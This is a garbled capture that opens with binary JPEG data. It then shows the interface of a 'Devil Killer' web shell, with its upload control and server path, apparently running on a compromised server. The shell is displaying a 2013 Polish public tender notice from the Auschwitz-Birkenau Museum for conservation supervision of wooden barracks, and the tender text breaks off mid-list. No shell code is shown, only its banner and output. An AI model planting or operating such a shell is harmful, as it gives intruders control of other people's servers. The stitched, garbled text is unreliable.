JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131107/454882-N-2013.html

<p class="kh_header"><b>Oświęcim: Nadzór konserwatorski przy realizacji zadania Prace konserwatorskie i roboty budowlane dotyczące baraków drewnianych o numerach inw. B-154 oraz B-159 w związku z realizacją projektu współfinansowanego z grantu z Komisji Europejskiej pn.: 
Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012-2015</b><br>
<b>Numer ogłoszenia: 454882 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 33 844 8003, faks 33 843 18 62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór konserwatorski przy realizacji zadania Prace konserwatorskie i roboty budowlane dotyczące baraków drewnianych o numerach inw. B-154 oraz B-159 w związku z realizacją projektu współfinansowanego z grantu z Komisji Europejskiej pn.: 
Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012-2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa pełnienia nadzoru konserwatorskiego podczas realizacji zadania: Prace konserwatorskie i roboty budowlane dotyczące baraków drewnianych o numerach inw. B-154 oraz B-159 w związku z realizacją projektu współfinansowanego z grantu z Komisji Europejskiej pn.: Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012-2015. Ilekroć w niniejszym ogłoszeniu jest mowa o: 1) Harmonogramie rzeczowo-finansowym należy przez to rozumieć harmonogram Wykonawcy; 2) Szczegółowym harmonogramie rzeczowo-finansowym należy przez to rozumieć Harmonogram Wykonawcy prac konserwatorskich i robót budowlanych; 3) Zadaniu należy przez to rozumieć zadanie pn.: Prace konserwatorskie wraz z towarzyszącymi robotami budowlanymi dotyczące baraków drewnianych o numerach inw. B-154 oraz B-159 zlokalizowanych na terenie odcinka BIIa dawnego obozu Auschwitz II-Birkenau w związku z realizacją projektu współfinansowanego z grantu bezpośredniego Komisji Europejskiej pn.: Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012-2015. Do obowiązków Wykonawcy w zakresie realizacji zamówienia należeć będzie: a)Dokonanie analizy i zatwierdzanie Szczegółowego harmonogramu rzeczowo-finansowego; b)Reprezentowanie Zamawiającego podczas realizacji Zadania przez sprawowanie nadzoru konserwatorskiego nad prowadzonymi pracami konserwatorskimi oraz robotami budowlanymi, w tym kontroli zgodności prowadzonych prac konserwatorskich oraz robót budowlanych z wydanymi pozwoleniami konserwatorskimi, uzgodnioną dokumentacją, tj. programami konserwatorskimi, projektami budowlanymi, sztuką konserwatorską oraz ustawą z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003r. nr 162, poz. 1568 z późn. zm.), rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987) oraz z treścią umowy zawartej pomiędzy Zamawiającym, a Wykonawcą prac konserwatorskich i robót budowlanych, a także ze Szczegółowym harmonogramem rzeczowo-finansowym; c)Pełnienie przez Inspektora nadzoru konserwatorskiego w specjalności konserwacji i restauracji malarstwa i rzeźby polichromowanej/konserwacji malarstwa oraz Inspektora nadzoru konserwatorskiego w specjalności konserwacji i restauracji elementów i detali architektonicznych/konserwacja rzeźby, nadzoru konserwatorskiego polegającego na zapobieganiu w toku realizacji Zadania zagrożeniom, w szczególności związanym pośrednio lub bezpośrednio z jakimkolwiek naruszeniem substancji zabytku mogącym spowodować uszczerbek dla wartości zabytku podczas realizacji robót budowlanych i prac konserwatorskich;d)Współpraca z inspektorem nadzoru inwestorskiego branży konstrukcyjnej i elektrycznej i osobą sprawującą nadzór archeologiczny (inspektor nadzoru archeologicznego);e)Rozwiązywanie problemów związanych z technologią prowadzenia prac konserwatorskich, ewentualnie inicjowanie spotkań komisji konserwatorskiej w ramach bieżących potrzeb lub w przypadku wystąpienia spornych kwestii lub innych skomplikowanych problemów wymagających rozwiązania; f)Potwierdzanie faktycznie wykonanych prac konserwatorskich zgodnie ze Szczegółowym harmonogramem rzeczowo-finansowym oraz z wydanymi pozwoleniami konserwatorskimi, uzgodnioną dokumentacją tj. programami konserwatorskimi, sztuką konserwatorską oraz z ustawą z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003r. nr 162 poz. 1568 z późn. zm.) oraz rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987);g)Weryfikacja i odbiór dokumentacji z przeprowadzonych prac konserwatorskich oraz budowlanych;h)Sprawdzanie dokumentów przedłożonych przez Wykonawcę prac konserwatorskich i robót budowlanych do inspekcji technicznych i odbioru końcowego w zakresie dotyczącym zagadnień konserwatorskich; i)Podejmowanie w toku realizacji Zadania wspólnie z Zamawiającym decyzji dotyczących zagadnień konserwatorskich;j)Przeprowadzenie rozliczenia wykonanych i odebranych prac konserwatorskich, zgodnie z umową z Wykonawcą prac konserwatorskich i robót budowlanych, a w szczególności: czynności kontrolne i weryfikacja faktur;k)Uczestnictwo w odbiorach przy pracach zanikających i inspekcjach technicznych oraz odbiorze końcowym;l)Dokonanie rozliczenia końcowego Zadania w zakresie prac konserwatorskich;m)Uczestniczenie w spotkaniach organizowanych przez Zamawiającego, Wykonawcę prac konserwatorskich i robót budowlanych oraz sporządzanie protokołów z narad; n)Dojazd i pobyt na placu budowy oraz w pracowni konserwatorskiej Wykonawcy prac konserwatorskich i robót budowlanych zgodnie z Harmonogramem rzeczowo-finansowym po wcześniejszym uzgodnieniu z Zamawiającym; Uwaga! Koszty dojazdu na plac budowy i/lub do pracowni konserwatorskiej ponosi Wykonawca. o)W przypadku wyniknięcia po zakończeniu usługi kwestii spornych dotyczących zagadnień konserwatorskich i robót budowlanych pomiędzy Zamawiającym a Wykonawcą prac konserwatorskich i robót budowlanych, Wykonawca zobowiązany jest do nieodpłatnego uczestnictwa w działaniach mających na celu rozstrzygnięcie kwestii spornych poprzez sporządzenie niezbędnych opinii, weryfikacji itp. przez cały okres udzielonej przez Wykonawcę prac konserwatorskich i robót budowlanych gwarancji i rękojmi; p)Prowadzenie dokumentacji z przeprowadzonych nadzorów w formie dziennika nadzorów konserwatorskich; Zamawiający zastrzega sobie prawo żądania w toku realizacji zamówienia wglądu do dziennika nadzorów konserwatorskich; q)Dokonywanie regularnych wpisów do dziennika prac konserwatorskich i dziennika budowy; r)Składanie raz na trzy miesiące raportów o stanie zaawansowania Zadania oraz występujących trudnościach w realizacji prac konserwatorskich i odstępstwach od umowy zawartej przez Zamawiającego z Wykonawcą Zadania. Każdy Raport powinien zawierać co najmniej: wykaz prac konserwatorskich rozpoczętych i zakończonych w danym okresie; analizę procentową wykonywanych prac konserwatorskich;informacje o pracach konserwatorskich planowanych na następny okres sprawozdawczy;siły, środki, sprzęt Wykonawcy prac konserwatorskich i robót budowlanych biorących udział w realizacji Zadania, dane dotyczące podwykonawców;informacje dotyczące realizacji prac konserwatorskich nadzorowanych przez Wykonawcę z uwzględnieniem zgodności prowadzonych prac z uzgodnioną dokumentacją i pozwoleniami konserwatorskimi;analizę zgodności postępu prac konserwatorskich ze Szczegółowym Harmonogramem rzeczowo-finansowym z opisem ewentualnych pojawiających się trudności oraz zastosowanych środkach zaradczych; krótki i rzeczowy opis problemów powstałych w trakcie wykonywania prac konserwatorskich wraz z propozycją działań, które należy podjąć w celu ich wyeliminowania; dokumentację fotograficzną (minimum 10 zdjęć obejmujących cały plac budowy) z przebiegu aktualnie prowadzonych prac i przedkładanie tej dokumentacji Zamawiającemu w formie cyfrowej (pliki źródłowe ze zdjęciami w formacie TIFF lub RAW, które muszą być wykonane w jakości umożliwiającej wydruk w formacie min. 15cmx20cm w rozdzielczości min. 300 dpi, rozdzielczość matrycy 12mln pikseli wymaga się, aby fotografie były ostre, wykonane przy dużej głębi ostrości, kadrowane w taki sposób, aby zachować piony i poziomy. Zdjęcia wraz z ich opisami powinny zostać wydrukowane łącznie na papierze fotograficznym. Wykonawca będzie przedkładał Zamawiającemu zdjęcia z przebiegu prac na warunkach określonych we wzorze umowy w sprawie zamówienia publicznego). s)Uczestniczenie w przeglądach w okresie 60 miesięcznej gwarancji i rękojmi udzielonej przez Wykonawcę prac konserwatorskich i robót budowlanych oraz kontrolowanie usuwania ujawnionych wad i usterek; Wizyty na budowie i w pracowni konserwatorskiej. Wykonawca zobowiązany jest do: a)jednej wizyty Inspektora nadzoru konserwatorskiego w każdym tygodniu realizacji Zadania na placu budowy i/lub w pracowni konserwatorskiej Wykonawcy prac konserwatorskich i robót budowlanych; b)dwóch wizyt Inspektora nadzoru konserwatorskiego w specjalności konserwacji i restauracji malarstwa i rzeźby polichromowanej/konserwacja malarstwa w każdym tygodniu podczas realizacji prac konserwatorskich nawarstwień malarskich i elementów drewnianych na placu budowy i/lub w pracowni konserwatorskiej; c)dwóch wizyt Inspektora nadzoru konserwatorskiego w specjalności konserwacji i restauracji elementów i detali architektonicznych/konserwacja rzeźby w każdym tygodniu podczas realizacji prac konserwatorskich zapraw mineralnych i elementów ceglanych na placu budowy i/lub w pracowni konserwatorskiej; d)obecności Inspektorów nadzoru konserwatorskiego podczas inspekcji technicznych z realizacji Zadania odbywających się raz na trzy miesiące. Podczas inspekcji dokonuje się oceny zgodności prac i robót z dokumentem określającym stan ich zaawansowania oraz dokonuje się oceny jakości wykonanych prac i robót. Koszty dojazdu na plac budowy i/lub do pracowni konserwatorskiej ponosi Wykonawca. Zakres prac do nadzorowania został szczegółowo opisany przy pomocy dokumentacji projektowej stanowiącej Dokumentację techniczną - Załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia, wraz ze specyfikacją techniczną wykonania i odbioru robót budowlanych stanowiącą jej integralną część. Dokumentacja techniczna, o której mowa w zdaniu poprzedzającym składa się z programów konserwatorskich opisujących szczegółowo prace konserwatorskie oraz z projektów budowlanych, wykonawczych oraz specyfikacji technicznych wykonania i odbioru robót a także przedmiarów opisujących szczegółowo prace konserwatorskie i roboty remontowo-budowlane.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każda oferta musi być zabezpieczona wadium w wysokości: 4000 zł (słownie: cztery tysiące złotych). 2.Wadium wnosi się przed upływem terminu składania ofert. 3.Za termin wniesienia wadium w pieniądzu uznaje się datę wpływu środków na rachunek Zamawiającego. 4.Wadium w pieniądzu zostanie skutecznie wniesione, jeżeli przed upływem terminu składania ofert kwota wadium wpłynie na rachunek bankowy Zamawiającego. 5.Wadium musi obejmować okres związania ofertą. 6.Wadium może być wnoszone w jednej lub kilku następujących formach: a)pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c)w gwarancjach bankowych, d)w gwarancjach ubezpieczeniowych, e)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dn. 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank PeKao S.A. o/Katowice, nr 90124029751111001044640881 z dopiskiem: wadium w postępowaniu na nadzór konserwatorski 7. Wadium wnoszone w formie lub w formach innych niż w pieniądzu, powinno być złożone w oryginale oraz powinno zawierać ustawowe przesłanki utraty wadium na rzecz Zamawiającego wskazane w art. 46 ust 4a) i ust. 5 ustawy wadium w formie gwarancji, gwarancja powinna być co najmniej gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze żądanie oraz powinna być sporządzona zgodnie z obowiązującym prawem. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 8.Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy Prawo zamówień publicznych z dn. 29.01.2004r. (Dz. U. 2013 poz. 907 z późn. zm.). 9.Zamawiający zatrzymuje wadium w wyniku okoliczności, o których mowa w art. 46 ust. 4a i 5ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje w tym zakresie szczegółowego opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego) wykaże(-ą), że posiada doświadczenie polegające na należytym wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługi nadzoru konserwatorskiego nad pracami konserwatorskimi w obiekcie zabytkowym wpisanym do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003 roku nr 162 poz. 1568 z późn.zm.) lub rejestru zabytków prowadzonego przez organ ustanowiony w tym celu w państwie obcym lub co najmniej 1 usługi kierowania pracami konserwatorskimi w obiekcie zabytkowym wpisanym do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003 roku nr 162 poz. 1568 z późn.zm.) lub rejestru zabytków prowadzonego przez organ ustanowiony w tym celu w państwie obcym, przy czym prace konserwatorskie musiały polegać co najmniej na: - konserwacji nawarstwień malarskich na podłożu drewnianym; - konserwacji wątku ceglanego; - konserwacji posadzek mineralnych lub innych powierzchni wykonanych z zapraw mineralnych; - konserwacji z zastosowaniem wzmocnienia drewna żywicami sztucznymi. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w tym zakresie, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje w tym zakresie szczegółowego opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca (Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia publicznego) wykaże(-ą), że dysponuje lub będzie dysponował co najmniej dwiema osobami, z których każda posiada: - uprawnienia do prowadzenia prac konserwatorskich przy zabytkach, zgodnie z rozporządzeniem Ministra Kultury z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011r. Nr 165 poz. 987); t.j.: tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbytą po ukończeniu tych studiów co najmniej 12 miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków. UWAGA: wymaga się, aby jedna ze wskazanych osób posiadała tytuł magistra uzyskany po ukończeniu wyższych studiów o specjalności konserwacja i restauracja elementów i detali architektonicznych/konserwacja rzeźby, natomiast druga posiadała tytuł magistra uzyskany po ukończeniu wyższych studiów o specjalności konserwacja i restauracja malarstwa i rzeźby polichromowanej/konserwacja malarstwa. - co najmniej 5-letnie (licząc od momentu uzyskania tytułu zawodowego magistra po ukończeniu właściwych studiów wyższych) doświadczenie zawodowe (rozumiane jako suma przepracowanych miesięcy) w nadzorze lub kierowaniu pracami konserwatorskimi w obiektach wpisanych do rejestru zabytków, o którym mowa w ustawie z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003 roku nr 162 poz. 1568 z późn.zm.) lub rejestru zabytków prowadzonego przez organ ustanowiony w tym celu w państwie obcym. UWAGA: Ze względu na wyjątkową, uniwersalną wartość i znaczenie Miejsca Pamięci Auschwitz-Birkenau, wpisanego na Listę Światowego Dziedzictwa UNESCO i do rejestru zabytków, jak również ze względu na brak skali porównawczej poruszanej problematyki, wymaga się od Wykonawców i osób, które będą wykonywały zamówienie najwyższych kwalifikacji, doświadczenia, zaangażowania i wrażliwości. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w tym zakresie, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego) wykaże(-ą), że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100 000,00 zł (słownie: sto tysięcy złotych).

Wartości określone w polisie lub innym dokumencie potwierdzającym ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, podane w walutach innych niż PLN Wykonawca przeliczy według średniego kursu NBP (Tabela A) na dzień wystawienia dokumentu.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w tym zakresie, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać w wykazie jedynie usługi wystarczające dla potwierdzenia spełniania warunku udziału w postępowaniu;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

